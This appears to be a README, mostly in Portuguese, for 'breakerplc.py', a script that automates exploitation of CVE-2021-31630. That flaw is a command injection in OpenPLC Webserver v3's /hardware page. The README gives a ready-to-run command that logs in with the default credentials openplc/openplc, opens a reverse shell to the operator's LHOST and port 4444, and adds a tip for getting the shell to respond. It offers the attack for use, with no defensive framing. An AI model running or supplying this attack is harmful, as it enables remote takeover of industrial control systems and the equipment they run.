
This is a automation of cve-2021-31630 exploitation
Este script explora automaticamente a vulnerabilidade no OpenPLC Web Server v3
Você será capaz de criar uma Reverse Shell automática com o servidor sem ter que usar técnicas manuais.
Detalhe do CVE-2021-31630 Injeção de comandos no Open PLC Webserver v3 permite que atacantes remotos executem código arbitrário através do componente "Hardware Layer Code Box" na página "/hardware" da aplicação.
O script foi personalizado para que, após completar o registro do script no OpenPLC, ele gere a shell da máquina no mesmo terminal.
Use o comando abaixo (Recomendamos criar um ambiente virtual Python para instalar as dependências) # No entanto, o script breakerplc.py deve ser executado fora do ambiente virtual.
sudo apt update
pip3 install requests
Como usar? você pode usar esta linha de comando (Abaixo).
python breakerplc.py -lh <your local ip> -lp 4444 <http://machine ip:8080> -u openplc -p openplc
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url
positional arguments:
url Target URL with http(s)://
options:
-h, --help show this help message and exit
-u U Username
-p P Password
-t T Request Timeout, increase if server is slow
-lh LH LHOST
-lp LP LPORT

IMPORTANTE
Após conectar, você precisa escrever "whoami" ou "ls" para quebrar a linha de código e retornar a shell.
